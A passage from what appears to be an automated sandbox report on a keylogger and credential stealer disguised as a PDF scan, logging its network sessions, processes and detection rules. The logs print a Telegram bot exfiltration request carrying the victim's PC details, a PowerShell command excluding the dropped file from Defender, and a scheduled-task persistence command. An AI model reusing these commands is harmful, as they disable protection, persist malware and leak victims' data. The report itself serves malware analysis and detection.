2024-10-25 07:17:22 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49732	188.114.97.3	443	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:22 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 07:17:22 UTC	896	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 318 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nq5Fh0CGEqNOPbaO45WBLzuMr%2FtiAXxg4jOqd0GeXiSEwzT4LLfppMQLoFhafOE69U8%2F%2BhUb2ydrKkzDOjoy2CCcKE9758SStSzjDxnH%2FDQrEfrWTs9wB9n7%2BPNn201kVuGbucln"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d2f6a7a2c96-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1284&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2170914&cwnd=249&unsent_bytes=0&cid=3dc4f6d08f459b8d&ts=153&x=0"
2024-10-25 07:17:22 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49736	188.114.97.3	443	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:24 UTC	63	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-25 07:17:24 UTC	892	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 320 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uw8oxhkTqQQ%2B8XJuw83jVRsMS1%2BACK6MZG9XmWYSUDtCpwUO35UnL8m0mMFLM8ycYzGm3NFEZEON0CigrSXvUQlukLCVHUYNVEDkB3D1zkJQJ3RXAf4I%2FDHNgUA4hZsusZKvMeCB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d39db49e51c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1178&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2399337&cwnd=249&unsent_bytes=0&cid=28886638a5559c51&ts=149&x=0"
2024-10-25 07:17:24 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49738	188.114.97.3	443	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:24 UTC	63	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-25 07:17:24 UTC	900	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 320 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fnrYoUx0bbJ%2B%2B%2BFi6ultCkrpqGKNh1MB3Sug7VsfrQbcuC3PSBuUClJ%2BHNwgoYXu1oB%2BSkoFjfzFrIpBfz0tRJR1kLs%2FVoE0FuB%2BHtcKZlvwoZLzCbTbjOmbXiadhrFPcLvK3d6m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d3a2cc2b787-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1383&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1887874&cwnd=106&unsent_bytes=0&cid=8fa6278d558939b2&ts=149&x=0"
2024-10-25 07:17:24 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49744	188.114.97.3	443	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:25 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 07:17:25 UTC	896	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 321 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O4KMRj7Rb76LFCC2QHGB3oSAEkO0qVIZQNjrufyrgD%2FxXzbmNWpp65j4hmI%2FHNcJmMP3pWcCC6nSzK5U03IPGl7v7bJ6k624BcvUmLxRYW5SeDlnjg1%2BeViXe702Ed%2BGimL%2Bizsz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d440c23474b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1719&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1685681&cwnd=251&unsent_bytes=0&cid=583017fe5f377ae2&ts=148&x=0"
2024-10-25 07:17:25 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49745	188.114.97.3	443	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:25 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 07:17:25 UTC	894	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 321 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqdK995q15RhpzCR%2Fg%2Fwn6y1JkH8E4zcwkIVFKDzBSJSjTWxpVrI0HFoHcoJgZ0j82fQkWIL532ZFXMpQA7Vh2N4DRg9KkFkVIxMd6%2Flf%2B9Sd7aUfVIDtwj0AKwU0yKHhN7y9YnB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d448bda2e6f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1375&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2084953&cwnd=250&unsent_bytes=0&cid=a835b8761d302be6&ts=152&x=0"
2024-10-25 07:17:25 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49747	149.154.167.220	443	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:26 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2025/10/2024%20/%2018:18:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-25 07:17:26 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 25 Oct 2024 07:17:26 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-25 07:17:26 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49749	188.114.97.3	443	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:27 UTC	63	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-25 07:17:27 UTC	894	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 323 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YHpH%2B9FIc3AtwlweH%2BTsWZTHwb9xwU40u9bnYuAw6UTOASRNAzJH8ki6T8KMRpEGwMzYC%2BfPdZyC%2B6MyQNdnLI0ekJdSZUtgH01OfbPEIvtbxwSWnITwhese1tPO7C9QfgnHmE1x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d4edafe6b41-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1093&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2538124&cwnd=250&unsent_bytes=0&cid=40d4557c974f7c56&ts=157&x=0"
2024-10-25 07:17:27 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49751	188.114.97.3	443	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:29 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 07:17:29 UTC	886	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 325 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b4q7by5WTCAVU1vOI0PRAMviPuyNR1CD6f5OY1fTzWZ2t3OUKmo5Xjyupp2gkzc45VIzyq7WtPAT5fHjrlawiYzOOQEK1aPbGNZhZFbYbNM3kFyq8tBchYEz3ErPQuviUJGlw0EP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d5a7d6f6b76-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2059&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1409245&cwnd=251&unsent_bytes=0&cid=0b5f472263126318&ts=162&x=0"
2024-10-25 07:17:29 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49752	149.154.167.220	443	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:30 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2025/10/2024%20/%2019:57:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-25 07:17:30 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 25 Oct 2024 07:17:30 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-25 07:17:30 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	1
Start time:	03:17:06
Start date:	25/10/2024
Path:	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"
Imagebase:	0xef0000
File size:	840'712 bytes
MD5 hash:	D8DAEB11E006370F3B454DF74C382CED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:17:08
Start date:	25/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe"
Imagebase:	0x700000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:17:08
Start date:	25/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:17:08
Start date:	25/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp"
Imagebase:	0xa50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:17:08
Start date:	25/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:17:08
Start date:	25/10/2024
